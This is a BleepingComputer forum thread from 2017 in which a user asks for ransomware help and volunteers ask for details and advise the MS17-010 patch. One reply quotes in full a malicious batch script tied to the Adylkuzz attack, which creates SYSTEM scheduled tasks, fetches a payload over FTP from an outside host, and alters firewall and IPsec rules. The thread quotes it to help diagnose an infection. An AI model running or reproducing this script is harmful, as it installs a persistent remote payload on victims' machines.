Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Ransomware Help


  • Please log in to reply
3 replies to this topic

#1 cungcapcaphe

cungcapcaphe

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:09:20 AM

Posted 21 June 2017 - 07:01 PM

I ReInstall Windows ...

7 day

1.png

2.png



BC AdBot (Login to Remove)

 


#2 Demonslay335

Demonslay335

    Ransomware Hunter


  • Security Colleague
  • 3,426 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:09:20 PM

Posted 21 June 2017 - 07:05 PM

We'll need more information than that. The URL in your screenshots is down, so I cannot download the malware to check it out.

 

Were your files encrypted? Have you submitted an encrypted file and ransom note to ID Ransomware for identification?


logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic]

ransomnotecleaner-25.png RansomNoteCleaner - Remove Ransom Notes Left Behind [Support Topic]

cryptosearch-25.pngCryptoSearch - Find Files Encrypted by Ransomware [Support Topic]

If I have helped you and you wish to support my ransomware fighting, you may support me here.


#3 al1963

al1963

  • Members
  • 882 posts
  • OFFLINE
  •  
  • Local time:08:20 AM

Posted 21 June 2017 - 11:06 PM

C2.bat here is the trace from the Adylkuzz attack about this:

 

ping 127.0.0.1 -n 10
net1 user IISUSER$ /del&net1 user IUSR_Servs /del
cacls c:\windows\twain_32\csrss.exe /e /d system&cacls c:\windows\twain_32\csrss.exe /e /d everyone&del c:\windows\twain_32\*.*
schtasks /create /tn "Mysa1" /tr "rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa" /ru "system" /sc onstart /F
schtasks
/create /tn "Mysa2" /tr "cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p" /ru "system" /sc onstart /F
netsh ipsec
static add policy name=win
netsh ipsec
static add filterlist name=Allowlist
netsh ipsec static add filterlist name=denylist
netsh ipsec
static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
netsh ipsec static add filteraction name=Allow action=permit
netsh ipsec
static add filteraction name=deny action=block
netsh ipsec
static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
netsh ipsec
static set policy name=win assign=y
ver
| find "5.1." > NUL && sc config SharedAccess start= auto && net start SharedAccess && netsh firewall set opmode mode=enable && netsh firewall set portopening protocol = ALL port = 445 name = 445 mode = DISABLE scope = ALL profile = ALL
@Wmic Process Where "Name='winlogon.exe' And ExecutablePath='C:\Windows\system\winlogon.exe'" Call Terminate &del C:\Windows\system\winlogon.exe
@Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\Windows\system\svchost.exe'" Call Terminate &del C:\Windows\system\svchost.exe
@Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\Windows\twain_32\svchost.exe'" Call Terminate &del C:\Windows\twain_32\svchost.exe
@Wmic Process Where "Name='csrss.exe' And ExecutablePath='C:\Windows\twain_32\csrss.exe'" Call Terminate &del C:\Windows\twain_32\csrss.exe
@Wmic Process Where "Name='csrss.exe' And ExecutablePath='C:\Windows\tasks\csrss.exe'" Call Terminate &del C:\Windows\tasks\csrss.exe
del C:\WINDOWS\Debug\c2.bat
exit

 

Probably in the system was and WMI infection.



#4 thyrex

thyrex

  • Members
  • 526 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Belarus
  • Local time:05:20 AM

Posted 22 June 2017 - 01:20 AM

At first you need install MS17-010 Critical Fix


Microsoft MVP 2012-2016 Consumer Security

Microsoft Reconnect 2016





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users